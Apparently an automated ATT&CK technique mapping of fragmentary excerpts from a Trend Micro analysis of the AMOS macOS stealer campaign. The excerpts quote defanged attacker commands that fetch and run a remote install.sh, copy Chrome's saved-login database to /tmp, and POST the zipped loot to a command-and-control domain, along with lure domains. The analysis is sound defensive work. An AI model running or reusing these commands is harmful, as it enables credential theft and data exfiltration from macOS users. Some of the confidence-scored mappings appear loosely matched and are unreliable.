“telemetry, and network indicators. During our analysis, the sequence of events began with suspicious process activity, credential theft-related tasks, and possible data exfiltration. These workbenches served as pivot points, prompting the team to launch a deeper investigation i…”
T1553.001 Gatekeeper Bypass (98%)
“//misshon[.]com/510f35e247f3359ad7d4temp/e1520e1f09765cb2d800/load.c6555d31d792b9c74904cefe10e9b13.php?call=seo4 As shown in Figure 12, running the infected .dmg file will display a prompt, which provides further instructions to install AMOS into the machine. Appl…”
T1555.003 Credentials from Web Browsers (97%)
“the /tmp/ directory. sh -c cat '/Users/<username>/Library/Application Support/Google/Chrome/Default/Login Data' > '/tmp/1552/chromium/chrome_default/Login Data' Input capture via password prompt – macOS | Possible sensitive information exfiltrat…”
T1204.002 Malicious File (95%)
“specialized malware family designed to steal sensitive data directly from Apple users. Trend Micro already detects this as Trojan.MacOS.AMOS.PFH. In this campaign, attackers lure macOS users with fake, “cracked” applications. Victims might download a malicious .dmg installer…”
T1059.004 Unix Shell (92%)
“the software installation would remain unsuccessful and display the following message: Method 2: Installation by copying and pasting commands via Apple Terminal. The second method of installing AMOS was more effective, achieving a higher success rate in distribution. This method…”
T1553.001 Gatekeeper Bypass (88%)
“allowing execution. In the case of AMOS, the malware was delivered as a .dmg file that lacked proper notarization. Because the targeted machines were running macOS Sequoia 15.5 (ARM) build 24F74, Gatekeeper automatically intervened, preventing the malicious installer from runn…”
T1204.004 Malicious Copy and Paste (82%)
“the command for users to copy and paste into the Apple Terminal also changes. In our observations, victims were redirected to domains such as ekochist[.]com, misshon[.]com, and toutentris[.]com, all serving as initial landing pages for AMOS. The threat actor uses frequen…”
T1059.002 AppleScript (80%)
“such as those used in AMOS campaigns, are blocked by default. While this doesn’t eliminate the risk entirely, especially for users who may bypass built-in protections, it raises the barrier for successful infections and forces attackers to adapt their delivery methods. In thi…”
T1105 Ingress Tool Transfer (79%)
“.]com/get4/install.sh - curl -fsSL hxxps://letrucvert[.]com/get8/install.sh Method 1: Installation via .dmg (clicking “Download for macOS”). Clicking the button will download a .dmg (e.g., installer_v.2.13.dmg) installer file with random version in …”
T1553.001 Gatekeeper Bypass (77%)
“where employees are most likely to be tricked by social engineering tactics. AMOS and similar threats will continue leaning on social engineering instead of relying on technical attacks. This could include the heavy use of malvertising on legitimate platforms like Google Ads as w…”
T1555.003 Credentials from Web Browsers (72%)
“, VPN profiles, keychain items, Apple Notes, and files from common folders. For business, this creates downstream risks, such as credential stuffing, financial theft, or further intrusions into enterprise systems. - AMOS shows that macOS is no longer a peripheral target. As macOS…”
T1059.002 AppleScript (65%)
“to continue. If the password is incorrect, the dialog box will continue to appear until the correct password is keyed in. Once the correct password is entered, a second pop-up dialog box appears, indicating that “Terminal” wants access to control the “Finder” app, which is …”
T1074.001 Local Data Staging (59%)
“all the data is organized into a randomly named directory within /tmp and compressed into a zip archive (/tmp/out.zip). curl - x post - h user : 7 / zioa7mzomylytawl6ub2avsrpudm3allmjbslwlnq = - h buildid : rzstkjpmpx2u / 16ldertq1sxfpe - pmw9nn9b15thsri = - h cl : 0 - h c…”
T1059.004 Unix Shell (49%)
“the command for users to copy and paste into the Apple Terminal also changes. In our observations, victims were redirected to domains such as ekochist[.]com, misshon[.]com, and toutentris[.]com, all serving as initial landing pages for AMOS. The threat actor uses frequen…”
T1071 Application Layer Protocol (46%)
“captured in the “System Preferences” dialog box. Below are the contents of the collected and exfiltrated file, “/tmp/out.zip/”: Based on the script and data we observed, the following information was collected and exfiltrated to the command-and-control server of t…”
T1553.001 Gatekeeper Bypass (39%)
“Terminal. Doing so bypasses macOS’s built-in security features, such as Gatekeeper. By shifting execution to the user, attackers reduce their effort while still increasing the likelihood of successful infection. MDR delivers round-the-clock monitoring, intelligent threat …”
T1555 Credentials from Password Stores (39%)
“, VPN profiles, keychain items, Apple Notes, and files from common folders. For business, this creates downstream risks, such as credential stuffing, financial theft, or further intrusions into enterprise systems. - AMOS shows that macOS is no longer a peripheral target. As macOS…”
T1553.001 Gatekeeper Bypass (36%)
“An MDR Analysis of the AMOS Stealer Campaign Targeting macOS via ‘Cracked’ Apps. Malware. Trend™ Research analyzed a campaign distributing Atomic macOS Stealer (AMOS), a malware family targeting m…”
T1560 Archive Collected Data (35%)
“all the data is organized into a randomly named directory within /tmp and compressed into a zip archive (/tmp/out.zip). curl - x post - h user : 7 / zioa7mzomylytawl6ub2avsrpudm3allmjbslwlnq = - h buildid : rzstkjpmpx2u / 16ldertq1sxfpe - pmw9nn9b15thsri = - h cl : 0 - h c…”
T1059.002 AppleScript (34%)
“it can run continuously and survive reboots. - System manipulation: The script hides Terminal windows and manipulates system files and applications. Table 1: Commands executed by AMOS, as detected by Vision One™. Installation of persistence: Trend Vision One also detected that a …”
T1204.002 Malicious File (33%)
“- h cn : 0 - f file = @ / tmp / out [. ] zip hxxps [ : / / ] sivvino [. ] com / contact curl - x post - h user : bhdpwzwv - nuhnpkoviatqf9kdu9g2co / rfmtj5im - xc = - h buildid : oehs3fthtpezooewfruyck23g1oogorsx7vbxyr6dmu = - h cl : 0 - h cn : 0 - f file = @ / tmp / out. zip htt…”
T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol (33%)
“‘.agent’ script, which then runs in an infinite loop to detect the logged-in user and execute the hidden binary. The binary file establishes persistence by retrieving the username of the currently logged-in user, excluding root. Once the script is executed, it copies sensit…”
T1560.001 Archive via Utility (33%)
“- h cn : 0 - f file = @ / tmp / out [. ] zip hxxps [ : / / ] sivvino [. ] com / contact curl - x post - h user : bhdpwzwv - nuhnpkoviatqf9kdu9g2co / rfmtj5im - xc = - h buildid : oehs3fthtpezooewfruyck23g1oogorsx7vbxyr6dmu = - h cl : 0 - h cn : 0 - f file = @ / tmp / out. zip htt…”
T1055.001 Dynamic-link Library Injection (31%)
“allowing execution. In the case of AMOS, the malware was delivered as a .dmg file that lacked proper notarization. Because the targeted machines were running macOS Sequoia 15.5 (ARM) build 24F74, Gatekeeper automatically intervened, preventing the malicious installer from runn…”
Summary
Trend™ Research analyzed a campaign distributing Atomic macOS Stealer (AMOS), a malware family targeting macOS users. Attackers disguise the malware as “cracked” versions of legitimate apps, luring users into installation.